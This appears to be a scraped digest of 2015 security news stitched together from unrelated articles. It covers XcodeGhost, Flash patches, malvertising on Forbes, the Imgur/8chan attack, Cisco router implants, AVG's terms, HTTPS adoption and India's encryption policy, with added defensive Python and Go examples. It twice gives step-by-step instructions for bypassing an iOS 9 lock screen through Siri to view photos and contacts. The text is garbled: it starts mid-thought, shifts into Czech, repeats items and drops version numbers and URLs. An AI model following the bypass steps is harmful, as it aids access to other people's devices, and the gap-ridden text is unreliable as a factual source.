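Hash the trusted copy once, keep the manifest somewhere the build machines cannot write to, and run the verification before every release build; anything under “added” or “modified” inside a framework directory is a stop-the-line finding.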

Felix Krause (@KrauseFx) tweeted on September 21, 2015: “Avoid submitting your app with a compromised version of Xcode by using the new `verify_xcode` fastlane action”
What’s next?
Apple has since confirmed to Reuters that all known malicious apps were removed from the App Store and that the company is working with developers to ensure they are using a genuine version of Xcode.

TechCrunch (@TechCrunch) tweeted on September 22, 2015: “Apple Asks Developers To Verify Their Version Of Xcode Following Malware Attack On Chinese App Store” by @sarahintampa
Unfortunately, the story does not end here. It is still unclear how many apps were affected: Reuters notes that the Chinese security firm Qihoo 360 Technology Co claims to have found 344 apps tainted with XcodeGhost.

The incident may mark the start of a new era in cybercrime, with developers at risk just like unofficial stores and ordinary users. Other criminals can copy the XcodeGhost creator’s tactics. Moreover, the SANS Institute reported that the author of XcodeGhost published the malware’s source code on GitHub, where it is now freely available.

Coincidentally, Xcode had already drawn media attention earlier this year, in the context of the “Jamboree,” a secret annual security-researcher gathering sponsored by the CIA.

The Intercept (@the_intercept) tweeted on March 10, 2015: “The CIA has waged a secret campaign to defeat security mechanisms built into Apple devices.”
At that gathering, some security researchers reported that they had created a modified version of Apple’s Xcode that could sneak surveillance backdoors into any app created with the tool.

Adobe Releases 23 Security Updates for Flash Player


Adobe has released an important security bulletin that addresses a total of 23 critical vulnerabilities in Adobe Flash Player.
The fixes, for Windows, Linux and Mac users, address “critical [flaws] that could potentially allow [attackers] to take control of the affected system,” the company warned in an advisory on Monday.
Of the 23 flaws, 18 would have allowed attackers to remotely execute arbitrary code on affected machines and take control of them.
Critical Vulnerabilities
These 18 security vulnerabilities, all deemed highly critical, are as follows:
Type Confusion Vulnerability (CVE-2015-5573)
Use-after-free flaws (CVE-2015-5570, CVE-2015-5574, CVE-2015-5581, CVE-2015-5584, and CVE-2015-6682)
Buffer overflow bugs (CVE-2015-6676 and CVE-2015-6678)
Memory corruption vulnerabilities that could lead to Remote Code Execution (CVE-2015-5575, CVE-2015-5577, CVE-2015-5578, CVE-2015-5580, CVE-2015-5582, CVE-2015-5588, and CVE-2015-6677)
Stack corruption vulnerabilities (CVE-2015-5567 and CVE-2015-5579)
Stack overflow vulnerability (CVE-2015-5587)
Other Security Fixes
Same-origin-policy bypass bug (CVE-2015-6679)
Memory leakage security flaw (CVE-2015-5576)
Security bypass flaw that could lead to information disclosure (CVE-2015-5572)
The company also added extra validation checks to ensure that Flash Player rejects malicious content from vulnerable JSONP callback APIs.
Affected Software
According to the security bulletin posted by Adobe Monday morning, the affected products include:
Adobe Flash Player Desktop Runtime and Adobe Flash Player Extended Support Release version and earlier
Adobe Flash Player for Google Chrome version and earlier
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 version and earlier on Windows 10
Adobe Flash Player for IE (Internet Explorer) 10 and 11 version and earlier on Windows 8 and 8.1
Adobe Flash Player for Linux version and earlier
AIR Desktop Runtime version and earlier for Windows as well as Mac
AIR SDK version and AIR SDK & Compiler version and earlier on Windows, Android and iOS
AIR for Android version and earlier
The latest Adobe Flash Player versions are for Windows and Mac, as well as version for Linux.
Users of Chrome and Windows 8 running Internet Explorer will receive the updated version of Flash Player automatically. Users of other browsers can manually download updates from Adobe's download page.
Users of the Adobe Flash Player Extended Support Release are advised to update to the latest version.

Malvertising campaign targeted the Forbes website, putting millions of users at risk

Security researchers at FireEye have uncovered a new malvertising campaign that abused the popular news website Forbes. The campaign was discovered earlier this month; according to FireEye’s analysis, the attackers used the site’s ads to redirect visitors to pages hosting the Neutrino and Angler exploit kits.

“From Sept. 8 to Sept. 15, 2015, the website was serving content from a third-party advertising service that had been manipulated to redirect viewers to the Neutrino and Angler exploit kits. We notified Forbes, who worked quickly to correct the issue,” states the blog post published by FireEye.
The researchers found that the campaign abused a third-party advertising service, and that the redirects were triggered on only a limited number of old articles.

When an affected article on Forbes was loaded, the third-party advertising service was invoked and a JS file containing an iframe was loaded. That iframe did the dirty work: it redirected the user to the chosen exploit kit.


FireEye reported that Neutrino was the attackers’ primary choice, but the researchers also observed that use of the Angler exploit kit is becoming quite common.


“By abusing ad platforms – particularly ad platforms that enable Real Time Bidding, which we’ve covered before here – attackers can selectively target where the malicious content gets displayed,” FireEye states. “When these ads are served by mainstream websites, the potential for mass infection increases significantly, leaving users and enterprises at risk.”

Malvertising campaigns are typically used by criminal organizations to deliver ransomware or other malware, such as banking trojans and ad-fraud code.

According to the experts, the gang behind the recent malvertising campaigns leveraged a number of large ad networks, including AppNexus, DoubleClick and ExoClick.

Targeted attacks on 4chan and 8chan exploited bot code hidden on Imgur

A serious vulnerability was recently discovered in the Imgur service that allowed malicious code to be injected into an image link on the popular website.
Is your website popular? Great, then you are a privileged target for crooks. Just yesterday I reported on the latest malvertising campaign, which hit Forbes; today I present a different kind of attack that is equally dangerous and insidious.

Today we look at image-board web services, which are very popular, especially among youngsters: a sort of internet forum that allows users to post images. Because such services are so popular, compromising them reaches a large audience. It has now been reported that a serious vulnerability in the online image-sharing community Imgur was exploited by hackers to hide malicious code in images, control visitors’ browsers and take over the 4chan and 8chan image boards.

Imgur has already fixed the flaw and now prevents the upload of malicious images, but it confirmed that threat actors used the compromised pages in targeted attacks. According to Imgur, the attack was limited to those pages and did not involve the site’s main gallery page.

“Yesterday a vulnerability was discovered that made it possible to inject malicious code into an image link on Imgur,” explained the Imgur community director Sarah Schaaf.
“From our team’s analysis, it appears the exploit was targeted specifically to users of 4chan and 8chan via images shared to a specific sub-reddit on using Imgur’s image hosting and sharing tools.”

“The vulnerability was patched yesterday evening and we’re no longer serving affected images, but as a precaution we recommend that you clear your browsing data, cookies, and local storage.”


What was the attack scenario?

The attack injected JavaScript into the victims’ browser local storage that sent a ping to the attacker’s command-and-control servers every time the target visited 8chan.

The images containing the malicious code were posted to 4chan and a related subreddit. The attackers’ intent is not clear, and according to the available information the command-and-control servers were not used to send orders to the infected machines.

Reddit users report that the JavaScript created an off-screen iframe and embedded a Flash file that ran alongside Imgur’s other Flash components, making the attack less conspicuous.

“This flash file injected more JavaScript into the page [which looked] like an innocuous Pikachu animation,” one Reddit user says.

“This JavaScript was stored to the user’s localstorage which, since the iframe was pointing at 8chan, allowed the attacker to attach JavaScript to 8chan’s localstorage. Its functionality is to issue a GET request to and then decrypt the response. So far no one has been able to see a response from that web service, meaning it likely wasn’t activated yet or has already been deactivated. The outcome is that every time a user visited an 8chan page, it would phone home to check for instructions and then execute more JavaScript code.”
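Both this attack and the Forbes malvertising case above rely on the same building block: an iframe the user never sees, pointing at a third-party host. The following Python is an added example, not code from Imgur, FireEye or either article; it parses a captured page or ad creative and reports frames that are hidden by size, CSS or off-screen positioning, or that point outside an assumed first-party allowlist. The HTML sample is constructed and the hostnames in it are placeholders, not real attacker infrastructure:

```python
"""Flag hidden or off-screen iframes in captured HTML.

Malvertising redirectors and the Imgur/8chan attack both used frames the
victim never sees. The markers are the same in both cases: zero- or
one-pixel size, display:none / visibility:hidden, large negative offsets,
and a src on a host that is not the site's own. The allowlist is an
assumption of this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

FIRST_PARTY = ("imgur.com",)  # assumed allowlist; subdomains are accepted


def _px(value):
    """Parse '0', '1px' or '-9999px' to an int; None, '100%' or 'auto' -> None."""
    m = re.fullmatch(r"\s*(-?\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None


def _style_map(style):
    """'display:none; left:-9999px' -> {'display': 'none', 'left': '-9999px'}"""
    out = {}
    for decl in (style or "").split(";"):
        prop, sep, val = decl.partition(":")
        if sep:
            out[prop.strip().lower()] = val.strip().lower()
    return out


class IframeAuditor(HTMLParser):
    """Collects (src, reasons) for every iframe that looks hidden or foreign."""

    def __init__(self, first_party):
        super().__init__()
        self.first_party = first_party
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "") for name, value in attrs}
        style = _style_map(a.get("style"))
        reasons = []
        width = _px(a.get("width", style.get("width")))
        height = _px(a.get("height", style.get("height")))
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("zero/one-pixel frame")
        if style.get("display") == "none" or style.get("visibility") == "hidden":
            reasons.append("hidden via CSS")
        for prop in ("left", "top"):
            offset = _px(style.get(prop))
            if offset is not None and offset < -100:
                reasons.append(f"positioned off-screen ({prop}={offset})")
        host = (urlsplit(a.get("src", "")).hostname or "").lower()
        if host and not any(host == d or host.endswith("." + d) for d in self.first_party):
            reasons.append(f"third-party src {host}")
        if reasons:
            self.findings.append((a.get("src", ""), reasons))


def audit_iframes(html, first_party=FIRST_PARTY):
    """Return the list of suspicious iframes (src, reasons) found in html."""
    parser = IframeAuditor(first_party)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate embed, one 0x0 hidden third-party
# redirector (the malvertising pattern) and one off-screen one-pixel frame
# pointing at another site (the Imgur pattern). Hosts are placeholders.
SAMPLE_HTML = """
<html><body>
<img src="https://i.imgur.com/abc123.png">
<iframe src="https://i.imgur.com/embed/abc123" width="540" height="540"></iframe>
<iframe src="http://ads.example-adnetwork.invalid/r?c=9" width="0" height="0"
        style="display:none"></iframe>
<iframe src="https://board.example.invalid/pikachu"
        style="position:absolute; left:-9999px; top:-9999px; width:1px; height:1px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in audit_iframes(SAMPLE_HTML):
        print(src, "->", ", ".join(reasons))
```

Run it over the HTML an ad slot actually returned (or over the DOM serialized after scripts have run, since the frame is usually created dynamically); a first-party allowlist plus any one of the hiding markers is enough to quarantine the creative for review.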

As reported by The Register, the attacks were also described on various 4chan boards.

Imgur’s security team has implemented further controls so that only “valid” image files can be published, and it blocks any JavaScript.

As stated in Imgur’s official announcement, users are advised to clear their browsing data, cookies and local storage.

The problem with malware in Cisco routers is much more serious

23.9.2015 Viruses
Attackers have installed malicious firmware on at least two hundred Cisco routers used by companies in more than thirty countries.

That is the finding of an analysis by the Shadowserver Foundation, a group that fights cybercrime and monitors malicious activity on the internet. The attacks were flagged last Tuesday by Mandiant, a subsidiary of FireEye, which said the attackers had replaced the firmware on Cisco Systems ISR routers.

That modification then gives them persistent backdoor access to the system and lets them install malware modules into it.

As of last week, fourteen routers were thought to be compromised this way, in four countries: Mexico, Ukraine, India and the Philippines. The affected models were the Cisco 1841, 2811 and 3825, which are no longer sold.

Cisco therefore worked with volunteers from Shadowserver to run a scan intended to reveal other potentially compromised devices. The suspicion was confirmed.

Far more than fourteen routers had been compromised through the backdoor with the malware modification called SYNful Knock. The scan found another 199 unique IP addresses in 31 countries that showed signs of compromise. The most, 65, are in the US, followed by 12 in India and 11 in Russia.

“It is important to stress the seriousness of this problem. Detecting and remediating compromised routers should be a top priority,” Shadowserver says in its report, adding that it will soon begin notifying the affected operators of its findings.

By taking control of the routers, attackers gain access to network traffic and the ability to modify it, so they can redirect users to websites of their choosing or do further damage to devices on the local network that would otherwise be unreachable from the internet.

And since the devices the SYNful Knock authors target are typically professional routers used by companies or internet service providers, a considerable number of users could feel the impact of an attack.

AVG said it plainly: what it learns about you, it will also monetise

23.9.2015 Surveillance

Openness in the terms of use, a challenge to others to take the same approach, and shorter texts. Well then, a good PR move.
AVG first needled other companies a bit with a statement that it is time for short and understandable Terms of Use (and Privacy Policies too). That is a very good reminder, because nobody can read the dozens of pages from Microsoft or Facebook in full any more, let alone understand and follow them. Not to mention that they routinely include evasions and omit essential details.

AVG went about it thoroughly, and in the new terms (effective from 15 October) it says things plainly. In the section on collecting information about users it warns that it will collect IP addresses, user data, account data, phone numbers, SIM card details, IMEI, MEID and geolocation information. And that, unless they must be retained, it anonymises them.

But also that it collects a range of other information, some of which serves the classic “improving products and services”. What is fairly revolutionary, though, is that it states outright that it collects some data because it makes money from it: specifically the advertising identifier, browser and search history (including metadata), information about where and how you connect from, and information about the applications installed on your device and how you use them.

That is far from all: in a further section of the Terms AVG clearly says it may share non-personal data with third parties, and that it may publicly display aggregated or anonymous information. It does not share personal data, but can of course pass it to other companies affiliated with AVG. And that naturally also applies to payment information, to legal requirements, and to situations where AVG's rights or property need protecting.

The short terms did not turn out so short after all

The new Terms are not exactly short in the end, running to seven standard pages, but they are on the whole shorter than the equivalent terms at many other companies. They admit fairly clearly what everyone does anyway. And they also say fairly clearly that money is what to look for behind it all, and that when push comes to shove, nobody will show any consideration for users.

Publication of the new terms triggered stormy reactions from users (see for instance the Reddit thread “AVG anti virus just updated there privacy policy. it says that they can and will sell your browsing history to 3rd parties”), who mostly take offence in general terms, but in some cases point to more fundamental issues.

For instance that AVG will readily use information about where you go on the internet, and does not worry much about its rather personal nature. On the other hand, users readily hand their browser history to dubious browser add-ons, through which viruses, adware and malware can then exploit it.

A good point raised by critics of the new Terms is that AVG greatly broadens what it considers “non-personal” data. Above all, that while a single piece of data may not be personal, combined with others it can become personal. It should be noted, though, that AVG is in essence only “almost” honestly describing what everyone else does (and prefers not to describe in any detail).

What to add to all this? You have a choice: you don't have to use AVG (and you can hardly blame AVG and a free antivirus for needing to make money somehow), and you can try another antivirus. After carefully reading its Terms of Use and Privacy Policy, though, it is quite likely that you will either find essentially the same thing (written slightly differently) or, far more likely, that they will “forget” to tell you what they actually do. Because after all, what they know about you serves to “improve services and products”, and you have no chance of learning about any further use anyway.


23.9.2015 Zabezpečení

Internet směřuje k šifrování. To je dobrá zpráva, která přichází jako reakce na vlnu odposlechů, šmírování a přibývajících útoků. Technicky je vše dobře připraveno, servery i klientský software umí potřebné protokoly i šifrovací algoritmy. Jediným problémem tak zůstává dostupnost důvěryhodných certifikátů, které doposud bylo třeba platit, ověřovat a hlídat jejich platnost.

To byl důvod, proč správci často na podporu HTTPS rezignovali. Byť existovaly způsoby, jak získat certifikát velmi levně nebo dokonce zdarma, za tu práci jim to nestálo. Všechny výše zmíněné problémy by měly v listopadu zmizet spolu s příchodem certifikační autority Let's Encrypt, která nabídne důvěryhodné certifikáty všem, zdarma a s minimem konfigurace.

Padne tak poslední překážka v nasazování HTTPS a to by se mělo stávat čím dál větším standardem i na menších webech. Ty velké celosvětové už ho za samozřejmost považují. Nastal čas, abyste ho za samozřejmost začali považovat i vy a zelený zámeček se rozšířil i do těch nejzapadlejších koutů webu. HTTPS by mělo být všude.

Redakční poznámka: doposud podporu HTTPS nemá a věřte, že kdyby to záleželo jen na redakci, má ji deset let. Ovšem ledy se hnuly a měli bychom se dočkat již velmi brzy.

Unchanged content

Only with full end-to-end encryption can you be sure that nobody along the way has manipulated the content you are looking at. There are many ways to achieve that, and just as many reasons. It may be outright malicious intent, but it may also be just a modification that benefits the operator of the local network.

There are, for example, hotspots with "free internet" that insert their own tracking code or even ads into the web pages you browse. Without encryption you can never be sure that something hasn't been added, modified or removed.

Various proxy servers along the way can also make changes you have no interest in, or log specific parts of the traffic. Over unencrypted data you have absolutely no control. Only properly deployed HTTPS guarantees that the data passed unchanged from the start to the destination.

Secure identity

Many sites today are tied to the user's identity; we routinely log in to many services. It is therefore very sensible for login credentials not to travel across the open Internet. Anyone could intercept and misuse them. With today's proliferation of hotspots and the everyday use of laptops, tablets and phones, it is very easy to simply sit in a café and "listen" to the chatter around you. There are even very convenient tools for this that anyone can operate.

But even when the credentials don't travel in the clear and some kind of challenge-response login is used, the user is later identified only by a stored cookie, which can again be trivially captured, and the whole session can be hijacked from under the user's hands. In today's age of mobility nobody checks by IP address any more. It is simply too inconvenient to keep logging in.

Proving identity, however, also concerns the servers themselves. Recently, attacks on home routers have been on the rise, in which the attacker changes the DNS settings and then starts serving their own answers from their own recursive servers. They are then able to manipulate the victim's computer so that instead of the real sites it starts visiting their fake phishing copies.

The user then actually has no chance of noticing on their computer that something is wrong. The attacker can easily serve them a fake page, let them log in, and obtain the username and password. What they cannot do, though, is copy from the original site the private key belonging to the valid certificate. In other words, when you request the HTTPS version of a site you are safe and can easily tell that the other side really is who you wish to communicate with.
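As an added example (not part of the original article), the check a browser performs in the DNS-hijacking scenario above, written in Go with constructed in-memory keys: an assumed trusted CA issues legit.example its certificate, and an impostor who controls DNS but has neither the site's private key nor the CA's key can only present a self-signed copy under the same name. The CA name, host names and serial numbers are assumptions for this example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// newCert issues a certificate for name signed by signer under parent; when
// parent is nil the certificate is self-signed. Names and serials are
// constructed for this example only.
func newCert(name string, serial int64, ca bool, parent *x509.Certificate, signer *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: name},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		KeyUsage:              x509.KeyUsageDigitalSignature,
		BasicConstraintsValid: true,
		IsCA:                  ca,
	}
	if ca {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	} else {
		tmpl.DNSNames = []string{name}
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
	}
	if parent == nil { // self-signed: a root CA, or an impostor's home-made cert
		parent, signer = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// BrowserCheck mirrors the client-side test: the chain must end in a trusted
// root and the certificate must be valid for the host the user typed.
func BrowserCheck(leaf *x509.Certificate, host string, roots *x509.CertPool) string {
	_, err := leaf.Verify(x509.VerifyOptions{DNSName: host, Roots: roots})
	var unknownCA x509.UnknownAuthorityError
	var badHost x509.HostnameError
	switch {
	case err == nil:
		return "accepted"
	case errors.As(err, &unknownCA):
		return "rejected: not issued by a trusted CA"
	case errors.As(err, &badHost):
		return "rejected: certificate is for another host"
	}
	return "rejected: " + err.Error()
}

// RunScenario plays out the situation from the text: a trusted CA issues the
// real site its certificate, and a DNS hijacker presents a self-made one for
// the same name. It returns the verdicts for the genuine site, the impostor,
// and the genuine certificate shown under a name it was not issued for.
func RunScenario() (genuine, impostor, wrongName string, err error) {
	const site = "legit.example"
	caCert, caKey, err := newCert("Example Trusted CA", 1, true, nil, nil)
	if err != nil {
		return
	}
	// The site's private key never leaves its server; the CA signs the public half.
	siteCert, _, err := newCert(site, 2, false, caCert, caKey)
	if err != nil {
		return
	}
	// The attacker can claim the name but has neither the site's key nor the
	// CA's, so the best they can do is sign the certificate themselves.
	fakeCert, _, err := newCert(site, 3, false, nil, nil)
	if err != nil {
		return
	}
	roots := x509.NewCertPool() // what the browser trusts
	roots.AddCert(caCert)
	genuine = BrowserCheck(siteCert, site, roots)
	impostor = BrowserCheck(fakeCert, site, roots)
	wrongName = BrowserCheck(siteCert, "other.example", roots)
	return
}

func main() {
	g, i, w, err := RunScenario()
	fmt.Println("genuine:", g, "| impostor:", i, "| wrong name:", w, "| error:", err)
}
```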

Oversensitivity to sensitivity

Until we deploy encryption everywhere, we will have to deal with the question of which data is sensitive for the user and which isn't yet. Is this action still a public matter, or has the user already crossed the line and should be protected? As long as they only read, can they stay on HTTP, and once they start writing, must we start encrypting?

"Do not enter sensitive information on our site, it is not protected against eavesdropping." Such a notice should stand on many sites that insensitively decide to be suitable only for insensitive information. But why should we actually make this distinction and judge the quality of the data?

When we introduce encryption everywhere, we stop dealing with this question. We simply stop dividing data into sensitive and ordinary and will just have data. We set a high standard for data as such; sensitivity can then be left to the user, because only they know which data they can publish and which not.

Growing trust

If we start to treat encryption as the standard, more attention will be paid to it and users will start to take it as the standard. Browsers will be able to flip their logic and, instead of highlighting HTTPS on some sites, highlight unencrypted connections on the few remaining ones. An encrypted connection will thus become "the normal one".

That again increases user trust and strengthens the whole encrypted environment. If we start encrypting even "less important" data, we also help the "more important" data. Unencrypted content will gradually be pushed further to the edge of the network, and it won't pay off for attackers to focus on the small handful of users who still use fringe sites.

Higher speed

Encrypting a site also has a positive effect on its load time. Modern browsers support the SPDY protocol and HTTP/2, which is derived from it, but they allow their use only together with HTTPS. If the new protocol is used, so-called streams can be used for the transfer, allowing several requests to be handled in parallel. Pavel Satrapa describes it in detail in the article Jak funguje nový protokol HTTP/2 (How the new HTTP/2 protocol works).

In practice it is possible to speed up page loading by tens of percent, as you can try for yourself at the site The site loads 360 different objects (images in this case) and measures how the encrypted and unencrypted variants perform.

A speed-up of more than 50 %.
Whether a specific server supports SPDY can be checked at the site

HTTPS is the present, not the future

The Internet is clearly heading towards encryption. Big companies together with the Internet community are doing everything to make it a standard that we should not only expect but demand. It isn't some distant future; it's happening right now, and big organisations have already issued recommendations and set the ship on the right course.

The IETF says in RFC 7258 that pervasive monitoring is an attack in itself and that new protocols should treat encryption as the default state. The W3C says the web should actively prefer encrypted connections. Google gives encrypted sites an advantage. Browser makers are already trying to push warnings about unencrypted sites.

The goal of the whole Internet community is to make encryption the standard. The result will be cheaper, faster and simpler deployment for everyone. The Let's Encrypt initiative is just the first big swallow; believe us, more will follow. Software, documentation and services will change so that deploying encryption is very easy and eventually requires no effort at all. Then HTTP will disappear just as telnet once did.

Access Private Photos and Contacts Without a Passcode on iOS 9 devices

A hacker has found a way to access images and contacts stored on Apple iOS 9 devices even if they are protected with a passcode or Touch ID.
A few hours ago I posted the news on the decision of the security firm Zerodium to pay a $1 million prize for zero-day exploits and jailbreaks for the newborn iOS 9.

Now I discover that it is quite easy to access a user's personal photos and contact list stored on devices running iOS 9. According to colleagues at THEHACKERNEWS, a hacker has found a method to access private data even if the mobile device is protected with a passcode or Touch ID.

The hacker explained that, using Apple's personal assistant Siri, it is possible to access data on a mobile device running iOS 9 in less than 30 seconds.


Below the detailed instructions to bypass the passcode:
Take the Apple device running the iOS 9 and enter an incorrect passcode four times.
Depending on the length of your passcode, for the fifth attempt enter 3 or 5 digits and for the last one, press and hold the Home button to run Siri immediately followed by the 4th digit.
Once Siri appears, ask the assistant for the time.
Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.
Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on “Share”.
Tap the ‘Message’ icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
Select “Create New Contact,” and Tap on “Add Photo” and then on “Choose Photo”.
At this point you'll be able to access the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.
Below is the video proof of concept for the trick.

Although this kind of hack doesn't match the "Eligibility / Conditions" announced by Zerodium, it is interesting to note that it is quite easy to bypass the basic security measures implemented by the IT giant for its newborn iOS 9.

While waiting for a patch, iOS users can disable Siri on the lock screen by modifying the device settings under

Settings > Touch ID & Passcode

Once disabled, users will still be able to use Siri after unlocking their iOS 9 device.

My Government Doesn't Understand How Encryption and Cyber Security Work

Almost every day or every second day, when I come across various announcements in newspapers, on TV news channels and in press releases that the Indian Government and related policy-making organizations are going to set up their so-called "Cyber Security Task Forces" or have drafted "National Cyber Security Policies" with the aim of boosting cyber security in India, the first thing that comes to my mind is:
Why doesn't my Government understand how encryption and online cyber security work?
Yes, my Government really has no idea how encryption relates to users' privacy. And Narendra Modi's Government has done it again!
With the release of the draft National Encryption Policy, the government wants access to all your messages, whether sent over online email services like Gmail or messaging services like WhatsApp, Viber or Messenger.
The National Encryption Policy (before addendum) required:
Access to your Private Data
To store your digital messages or Emails for 90 Days in Plaintext
Share your Encryption Keys with Government
Foreign Services Providers to Comply with Indian Government
Yes, besides Indian service providers, the draft policy forces service providers outside India to sign an agreement under which the Indian government will prescribe the encryption algorithms and key sizes.
So, DeitY expects thousands of foreign service providers that encrypt their users' data to put government backdoors into their secure software — similar to what the NSA did for spying on US citizens.
DeitY believes that this would enhance cyber security in India. Oh! Really? Looks like the experts have got it all wrong.
Policy Triggered National Outrage (Policy Addendum)
However, after massive public outcry, the government has withdrawn the draft proposal and issued an addendum to the National Encryption Policy which says:
You will need to keep records of emails from Gmail and other email services, and have to submit them to Security agencies if required.
All Service Providers located within and outside India using Encryption technology for offering any services in India will need to register their services with the Government.
The Mass Use Encryption products, such as social media websites (Twitter and Facebook) and social media applications (WhatsApp, Viber, and Line), would not be regulated by the new National Encryption Policy.
SSL/TLS encryption products being used by Banking, e-commerce websites and Payment gateways will also be exempted.
The proposed National Encryption Policy would apply to everyone, including government departments, academic institutions and citizens, and to all kinds of communications, with legal action, including imprisonment, suggested for violations.
Both the earlier and the latest version of the 'National Encryption Policy' have raised several privacy concerns.
It seems the Indian government has once again proven itself to have zero knowledge of the issues related to privacy and online security.
At The Hacker News, our agenda is to educate the world about cyber security. However, in the country from where The Hacker News operates, where our own government is releasing such policies in the name of cybersecurity, we feel like a failure, for which we really apologize!
Any updates on the topic will be added to the article to keep you informed.

Deleting WhatsApp Messages Before 90 Days Could Land you in Jail

While the Indian people continue to struggle for net neutrality, a new problem has surrounded them with the release of the latest draft 'National Encryption Policy' by the Indian Government.
If you delete WhatsApp messages or emails that you receive or send before 90 days have passed, it might be a crime and you could end up in jail.
If the new National Encryption Policy, which comes with weird suggestions such as not deleting WhatsApp conversations, Gmail or any email for 90 days, is implemented, it would be an Internet disaster.
With the aim to 'provide confidentiality of information' and ensure 'protection of sensitive or proprietary information', the draft policy, proposed by a so-called 'expert panel' from the Department of Electronics and Information Technology (DeitY), requires:
Access to your Private Data
The government wants to have access to all your encrypted information including your personal emails, text and voice messages, and data stored in a private business server.
Not to Delete any WhatsApp Messages or Emails for 90 Days
The policy would force Internet users to save all encrypted communication data in plaintext for at least 90 days, including WhatsApp messages, emails, and sensitive banking or e-commerce transaction details.
Share your Encryption Keys with Government
The National Encryption Policy also wants Indian Internet users to give up their encryption keys to the Government and security agencies.
Foreign Services Providers need to Comply with Indian Government
In India, More than 80% of Internet users are addicted to Non-Indian services like WhatsApp, Facebook, Gmail, Skype, Telegram and thousands more.
But, the National Encryption Policy requires Service Providers located outside India to enter into an agreement with the Indian Government, which says:
“Encryption algorithms and key sizes will be prescribed by the Government,” the policy reads.
You can send your comments to by October 16, 2015.
The draft National Encryption Policy has triggered national outrage among citizens of India, who would be forced to store their online messages sent through WhatsApp, SMS, e-mail or any such service for up to 90 days.
Now Let’s see what the government decides.

iOS 9 Hack: How to Access Private Photos and Contacts Without a Passcode

Setting a passcode on your iPhone is the first line of defense to help prevent other people from accessing your device.
However, it's pretty easy for anyone to access your personal photographs and contacts on your iPhone running iOS 9 in 30 seconds or less, even with a passcode and/or Touch ID enabled.
Just yesterday, the security firm Zerodium announced a huge bug bounty of $1 million for zero-day exploits and jailbreaks for iPhones and iPads running iOS 9. Now...
A hacker has found a new and quite simple method of bypassing the security of a locked iOS device (iPhone, iPad or iPod touch) running Apple's latest iOS 9 operating system that could allow access to the device's photos and contacts in 30 seconds or less.
Yes, the passcode on any iOS device running iOS 9.0 can be bypassed using the benevolent nature of Apple's personal assistant Siri.
Here's the List of Steps to Bypass Passcode:
You need to follow these simple steps to bypass passcode on any iOS device running iOS 9.0:
Wake the iOS device and Enter an incorrect passcode four times.
For the fifth time, Enter 3 or 5 digits (depending on how long your passcode is), and for the last one, press and hold the Home button to invoke Siri immediately followed by the 4th digit.
After Siri appears, ask her for the time.
Tap the Clock icon to open the Clock app, and add a new Clock, then write anything in the Choose a City field.
Now double tap on the word you wrote to invoke the copy & paste menu, Select All and then click on "Share".
Tap the 'Message' icon in the Share Sheet, and again type something random, hit Return and double tap on the contact name on the top.
Select "Create New Contact," and Tap on "Add Photo" and then on "Choose Photo".
You'll now be able to see the entire photo library on the iOS device, which is still locked with a passcode. Now browse and view any photo from the Photo album individually.
Video Demonstration
You can also watch a video demonstration (given below) that shows the whole hack in action.

It isn't a remote flaw you need to worry about, as this only works if someone has physical access to your iPhone or iOS device. However, such an easy way to bypass any locked iOS device could put users' personal data at risk.
How to Prevent iOS 9 Hack
Until Apple fixes this issue, iOS users can protect themselves by disabling Siri on the lock screen from Settings > Touch ID & Passcode. Once disabled, you’ll only be able to use Siri after you have unlocked your iOS device using the passcode or your fingerprint.

WIN $1 Million Bounty For Hacking the New iOS 9 iPhone

Good news for Hackers and Bug hunters!
You can now WIN 1 Million Dollars for finding zero-day hacks for iPhones and iPads.
Yes, $1,000,000.00 Reward
This Huge Bug Bounty is offered by the new Security firm Zerodium, a startup of the infamous French-based Security firm "VUPEN", who is well known for buying and selling zero-day vulnerabilities.
Zerodium, which describes itself as "the premium zero-day acquisition platform," announced a total of $3 million ($3,000,000) in bounty rewards for iOS exploits and jailbreaks.
$3 Million Reward for Zero-day exploits and Jailbreaks
The Zero-day Acquisition Firm challenges hackers, researchers, and bug hunters to discover zero-day flaws and exploits in Apple's latest mobile operating system iOS 9 that must allow an attacker to remotely compromise a non-jailbroken iOS device through:
A web page,
In-app browsing action, or
text message or MMS (Multi-Media Messages)
"The whole exploitation [or] jailbreak process should be achievable remotely, silently, reliably, and without requiring any user interaction except visiting a webpage or reading an SMS [or] MMS," Zerodium says in a blog post.
However, the vulnerabilities in Airdrop, Bluetooth, NFC, or baseband would not qualify.
Also Read: For Better Privacy & Security, Change these iOS 9 Settings Immediately.
The firm is also offering a Million dollar bounty for finding untethered jailbreak for iOS 9 that must work on:
iPhone 6S
iPhone 6S Plus
iPad Air 2 and others
The bug bounty program is valid and open until October 31st, 2015 at 6:00 p.m. EDT, or until the firm ends up paying the total promised payout of $3 million to researchers and developers.

Adobe fixes dozens critical vulnerabilities in Flash Player

Adobe has released a new Flash Player update that patches 23 critical vulnerabilities in the popular software. Update your version asap.
Adobe has released a new Flash Player update that fixes 23 critical vulnerabilities in the popular software.

